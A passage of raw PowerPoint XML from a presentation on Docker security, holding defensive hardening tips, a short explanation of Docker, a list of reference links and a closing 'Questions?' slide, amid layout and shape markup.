              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Allocate a cap on hardware resources for all containers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allocate only required capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure to run authenticated Docker daemons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-bench to perform a CIS audit on your containers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Further reading: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>blog.aquasec.com/docker-security-best-practices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="36512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87661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Docker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a tool designed to make it easier to create, deploy, and run applications by using containers. Containers allow a developer to package up an application with all of the parts it needs, such as libraries and other dependencies, and ship it all out as one package</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Docker is currently the only ecosystem providing the full package:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resource Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File System Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>: https://medium.com/@yannmjl/what-is-docker-in-simple-english-a24e8136b90b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6602506" y="3646981"/>
            <a:ext cx="3435627" cy="1888726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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245190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66" name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="21" name="Object 20"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2" name="Rectangle 2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US" sz="2800" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="429290" y="1564374"/>
            <a:ext cx="11377899" cy="81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9977" tIns="179977" rIns="179977" bIns="179977" rtlCol="0" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://twitter.com/_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>fel1x/status/1151827567923609600</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>morphuslabs.com/attacking-docker-environments-a703fcad2a39</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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430857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518" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="426"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4" name="Rectangle 23"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US" sz="3600" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Picture 65"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="12650" b="26300"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="12192000" cy="4229100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="0"/>
            <a:ext cx="12191999" cy="4229100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:alpha val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:alpha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22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Title 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1219200"/>
            <a:ext cx="3676650" cy="1790700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="85" name="Gruppieren 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10758772" y="4954628"/>
            <a:ext cx="646382" cy="572082"/>
            <a:chOff x="1117601" y="5489575"/>
            <a:chExt cx="403225" cy="344487"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Freeform 1189"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1117601" y="5489575"/>
              <a:ext cx="336550" cy="344487"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 286 w 298"/>
                <a:gd name="T1" fmla="*/ 124 h 303"/>
                <a:gd name="T2" fmla="*/ 205 w 298"/>
                <a:gd name="T3" fmla="*/ 276 h 303"/>
                <a:gd name="T4" fmla="*/ 33 w 298"/>
                <a:gd name="T5" fmla="*/ 215 h 303"/>
                <a:gd name="T6" fmla="*/ 77 w 298"/>
                <a:gd name="T7" fmla="*/ 38 h 303"/>
                <a:gd name="T8" fmla="*/ 244 w 298"/>
                <a:gd name="T9" fmla="*/ 50 h 303"/>
                <a:gd name="T10" fmla="*/ 227 w 298"/>
                <a:gd name="T11" fmla="*/ 69 h 303"/>
                <a:gd name="T12" fmla="*/ 205 w 298"/>
                <a:gd name="T13" fmla="*/ 55 h 303"/>
                <a:gd name="T14" fmla="*/ 100 w 298"/>
                <a:gd name="T15" fmla="*/ 55 h 303"/>
                <a:gd name="T16" fmla="*/ 45 w 298"/>
                <a:gd name="T17" fmla="*/ 130 h 303"/>
                <a:gd name="T18" fmla="*/ 126 w 298"/>
                <a:gd name="T19" fmla="*/ 256 h 303"/>
                <a:gd name="T20" fmla="*/ 261 w 298"/>
                <a:gd name="T21" fmla="*/ 167 h 303"/>
                <a:gd name="T22" fmla="*/ 260 w 298"/>
                <a:gd name="T23" fmla="*/ 132 h 303"/>
                <a:gd name="T24" fmla="*/ 263 w 298"/>
                <a:gd name="T25" fmla="*/ 127 h 303"/>
                <a:gd name="T26" fmla="*/ 286 w 298"/>
                <a:gd name="T27" fmla="*/ 12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8" h="303">
                  <a:moveTo>
                    <a:pt x="286" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="182"/>
                    <a:pt x="268" y="249"/>
                    <a:pt x="205" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="303"/>
                    <a:pt x="66" y="276"/>
                    <a:pt x="33" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="154"/>
                    <a:pt x="18" y="79"/>
                    <a:pt x="77" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="0"/>
                    <a:pt x="203" y="12"/>
                    <a:pt x="244" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="60"/>
                    <a:pt x="234" y="65"/>
                    <a:pt x="227" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="64"/>
                    <a:pt x="212" y="59"/>
                    <a:pt x="205" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="36"/>
                    <a:pt x="135" y="36"/>
                    <a:pt x="100" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="71"/>
                    <a:pt x="52" y="97"/>
                    <a:pt x="45" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="187"/>
                    <a:pt x="70" y="242"/>
                    <a:pt x="126" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="272"/>
                    <a:pt x="251" y="231"/>
                    <a:pt x="261" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="155"/>
                    <a:pt x="263" y="144"/>
                    <a:pt x="260" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="129"/>
                    <a:pt x="260" y="128"/>
                    <a:pt x="263" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271" y="124"/>
                    <a:pt x="278" y="124"/>
                    <a:pt x="286"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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="Freeform 1190"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1255713" y="5510213"/>
              <a:ext cx="265113" cy="185737"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 234"/>
                <a:gd name="T1" fmla="*/ 0 h 164"/>
                <a:gd name="T2" fmla="*/ 194 w 234"/>
                <a:gd name="T3" fmla="*/ 42 h 164"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 54 h 164"/>
                <a:gd name="T6" fmla="*/ 232 w 234"/>
                <a:gd name="T7" fmla="*/ 56 h 164"/>
                <a:gd name="T8" fmla="*/ 176 w 234"/>
                <a:gd name="T9" fmla="*/ 87 h 164"/>
                <a:gd name="T10" fmla="*/ 171 w 234"/>
                <a:gd name="T11" fmla="*/ 88 h 164"/>
                <a:gd name="T12" fmla="*/ 124 w 234"/>
                <a:gd name="T13" fmla="*/ 95 h 164"/>
                <a:gd name="T14" fmla="*/ 62 w 234"/>
                <a:gd name="T15" fmla="*/ 130 h 164"/>
                <a:gd name="T16" fmla="*/ 60 w 234"/>
                <a:gd name="T17" fmla="*/ 134 h 164"/>
                <a:gd name="T18" fmla="*/ 38 w 234"/>
                <a:gd name="T19" fmla="*/ 160 h 164"/>
                <a:gd name="T20" fmla="*/ 8 w 234"/>
                <a:gd name="T21" fmla="*/ 150 h 164"/>
                <a:gd name="T22" fmla="*/ 9 w 234"/>
                <a:gd name="T23" fmla="*/ 114 h 164"/>
                <a:gd name="T24" fmla="*/ 44 w 234"/>
                <a:gd name="T25" fmla="*/ 107 h 164"/>
                <a:gd name="T26" fmla="*/ 50 w 234"/>
                <a:gd name="T27" fmla="*/ 108 h 164"/>
                <a:gd name="T28" fmla="*/ 113 w 234"/>
                <a:gd name="T29" fmla="*/ 72 h 164"/>
                <a:gd name="T30" fmla="*/ 142 w 234"/>
                <a:gd name="T31" fmla="*/ 38 h 164"/>
                <a:gd name="T32" fmla="*/ 147 w 234"/>
                <a:gd name="T33" fmla="*/ 32 h 164"/>
                <a:gd name="T34" fmla="*/ 201 w 234"/>
                <a:gd name="T35" fmla="*/ 2 h 164"/>
                <a:gd name="T36" fmla="*/ 205 w 234"/>
                <a:gd name="T3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164">
                  <a:moveTo>
                    <a:pt x="205" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="15"/>
                    <a:pt x="197" y="28"/>
                    <a:pt x="194" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="46"/>
                    <a:pt x="221" y="50"/>
                    <a:pt x="234" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="55"/>
